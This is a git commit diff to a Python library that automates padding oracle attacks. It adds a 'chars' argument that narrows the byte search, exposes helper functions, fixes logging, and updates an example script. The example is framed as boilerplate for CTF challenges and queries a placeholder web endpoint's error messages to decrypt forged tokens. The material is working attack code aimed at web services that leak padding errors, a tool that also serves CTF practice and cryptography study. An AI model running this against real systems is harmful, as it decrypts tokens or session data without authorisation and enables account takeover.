Add chars arg and modify example code

Author: djosix

README.md

@@ -33,27 +33,26 @@ All you need is defining the **oracle function** to check whether the given ciph
 
 ```python
 from padding_oracle import *
-
-import requests
+import requests, string
 
 # Create a requests.Session to enable connection pool
 sess = requests.Session()
 
 # Define a function to test if the cipher can be decrypted
-def oracle(cipher):
-    resp = sess.post('http://some-website.com/decrypt',
-                     data={'cipher': base64_encode(cipher)}).text
-    assert 'Good' in resp or 'Bad' in resp, 'Exception?'
-    return 'Good' in resp
+def oracle(cipher: bytes):
+    token = base64_encode(cipher)
+    resp = sess.post('http://insucure.com/verify_token', data={'token': token})
+    assert 'failed' in resp.text or 'success' in resp.text, 'exception???'
+    return 'decryption failed' not in resp.text
 
 
+# cipher = base64_decode(token)
 cipher = b'[______IV______][____Block1____][____Block2____]'
 
-
 # DECRYPT THE CIPHER!!!
 plaintext = padding_oracle(cipher,
                            block_size=16,
                            oracle=oracle,
-                           num_threads=64)
-
+                           num_threads=16,
+                           chars=string.printable)
 ```

example.py

@@ -1,23 +1,28 @@
+'''
+Boilerplate script for solving padding oracle challenges.
+'''
+
 from padding_oracle import *
 
-import requests
+import requests, string
 
 # Create a requests.Session to enable connection pool
 sess = requests.Session()
 
 # Define a function to test if the cipher can be decrypted
-def oracle(cipher):
-    resp = sess.post('http://some-website.com/decrypt',
-                     data={'cipher': base64_encode(cipher)}).text
-    assert 'Good' in resp or 'Bad' in resp, 'Exception?'
-    return 'Good' in resp
+def oracle(cipher: bytes):
+    token = base64_encode(cipher)
+    resp = sess.post('http://insucure.com/verify_token', data={'token': token})
+    assert 'failed' in resp.text or 'success' in resp.text, 'exception???'
+    return 'decryption failed' not in resp.text
 
 
+# cipher = base64_decode(token)
 cipher = b'[______IV______][____Block1____][____Block2____]'
 
-
 # DECRYPT THE CIPHER!!!
 plaintext = padding_oracle(cipher,
                            block_size=16,
                            oracle=oracle,
-                           num_threads=64)
+                           num_threads=16,
+                           chars=string.printable)

padding_oracle/encoding.py

@@ -26,18 +26,19 @@
 
 __all__ = [
     'base64_encode', 'base64_decode',
-    'urlencode', 'urldecode'
+    'urlencode', 'urldecode',
+    'to_bytes', 'to_str'
 ]
 
 
-def _to_bytes(data: Union[str, bytes]):
+def to_bytes(data: Union[str, bytes]):
     if isinstance(data, str):
         data = data.encode()
     assert isinstance(data, bytes)
     return data
 
 
-def _to_str(data):
+def to_str(data):
     if isinstance(data, bytes):
         data = data.decode()
     elif isinstance(data, str):
@@ -48,20 +49,20 @@ def _to_str(data):
 
 
 def base64_decode(data: Union[str, bytes]) -> bytes:
-    data = _to_bytes(data)
+    data = to_bytes(data)
     return base64.b64decode(data)
 
 
 def base64_encode(data: Union[str, bytes]) -> str:
-    data = _to_bytes(data)
+    data = to_bytes(data)
     return base64.b64encode(data).decode()
 
 
 def urlencode(data: Union[str, bytes]) -> str:
-    data = _to_bytes(data)
+    data = to_bytes(data)
     return urllib.parse.quote(data)
 
 
 def urldecode(data: str) -> bytes:
-    data = _to_str(data)
+    data = to_str(data)
     return urllib.parse.unquote_plus(data)

padding_oracle/padding_oracle.py

@@ -25,7 +25,7 @@
 from typing import Union, Callable
 from concurrent.futures import ThreadPoolExecutor
 
-from .encoding import *
+from .encoding import to_bytes
 
 __all__ = [
     'padding_oracle',
@@ -43,7 +43,7 @@ def remove_padding(data: Union[str, bytes]):
     Returns:
         data with padding removed (bytes)
     '''
-    data = _to_bytes(data)
+    data = to_bytes(data)
     return data[:-data[-1]]
 
 
@@ -61,18 +61,20 @@ def padding_oracle(cipher: bytes,
                    oracle: Callable[[bytes], bool],
                    num_threads: int = 1,
                    log_level: int = logging.INFO,
+                   chars=None,
                    null: bytes = b' ') -> bytes:
     '''
     Run padding oracle attack to decrypt cipher given a function to check wether the cipher
     can be decrypted successfully.
 
     Args:
-        cipher      (bytes)     the cipher you want to decrypt
+        cipher      (bytes|str) the cipher you want to decrypt
         block_size  (int)       block size (the cipher length should be multiple of this)
         oracle      (function)  a function: oracle(cipher: bytes) -> bool
         num_threads (int)       how many oracle functions will be run in parallel (default: 1)
         log_level   (int)       log level (default: logging.INFO)
-        null        (bytes)     the default byte when plaintext are not set (default: b' ')
+        chars       (bytes|str) possible characters in your plaintext, None for all
+        null        (bytes|str) the default byte when plaintext are not set (default: b' ')
 
     Returns:
         plaintext   (bytes)     the decrypted plaintext
@@ -81,23 +83,33 @@ def padding_oracle(cipher: bytes,
     # Check args
     assert callable(oracle), 'the oracle function should be callable'
     assert oracle.__code__.co_argcount == 1, 'expect oracle function with only 1 argument'
-    assert isinstance(cipher, bytes), 'cipher should have type bytes'
+    assert isinstance(cipher, (bytes, str)), 'cipher should have type bytes'
     assert isinstance(block_size, int), 'block_size should have type int'
     assert len(cipher) % block_size == 0, 'cipher length should be multiple of block size'
     assert 1 <= num_threads <= 1000, 'num_threads should be in [1, 1000]'
-    assert isinstance(null, bytes), 'expect null with type bytes'
+    assert isinstance(null, (bytes, str)), 'expect null with type bytes or str'
     assert len(null) == 1, 'null byte should have length of 1'
+    assert isinstance(chars, (bytes, str)) or chars is None, 'chars should be None or type bytes'
 
     logger = _get_logger()
     logger.setLevel(log_level)
+    
+    cipher = to_bytes(cipher)
+    null = to_bytes(null)
+    
+    if chars is None:
+        chars = set(range(256))
+    else:
+        chars = set(to_bytes(chars))
+        chars |= set(range(1, block_size + 1)) # include PCKS#7 padding bytes
 
     # Wrapper to handle exception from the oracle function
     def _oracle_wrapper(i: int, j: int, cipher: bytes):
         try:
             return oracle(cipher)
         except Exception as e:
-            logger.error('unhandled error at block[{}][{}]: ', i, j, e)
-            logger.debug('error details at block[{}][{}]: ', i, j, traceback.format_exc())
+            logger.error('unhandled error at block[{}][{}]: {}'.format(i, j, e))
+            logger.debug('error details at block[{}][{}]: {}'.format(i, j, traceback.format_exc()))
         return False
 
     # The plaintext bytes list to store the decrypted data
@@ -119,7 +131,9 @@ def _block_decrypt_task(i, prev: bytes, block: bytes):
             oracle_hits = []
             oracle_futures = {}
 
-            for k in range(256):
+            for c in chars:
+                k = c ^ j ^ prev[-j]
+                
                 if i == len(blocks) - 1 and j == 1 and k == prev[-j]:
                     # skip the last padding byte if it is identical to the original cipher
                     continue

setup.py

@@ -5,7 +5,7 @@
 
 setuptools.setup(
     name='padding_oracle',
-    version='0.1.4',
+    version='0.1.7',
     author='Yuankui Lee',
     author_email='[email protected]',
     description='Threaded padding oracle automation.',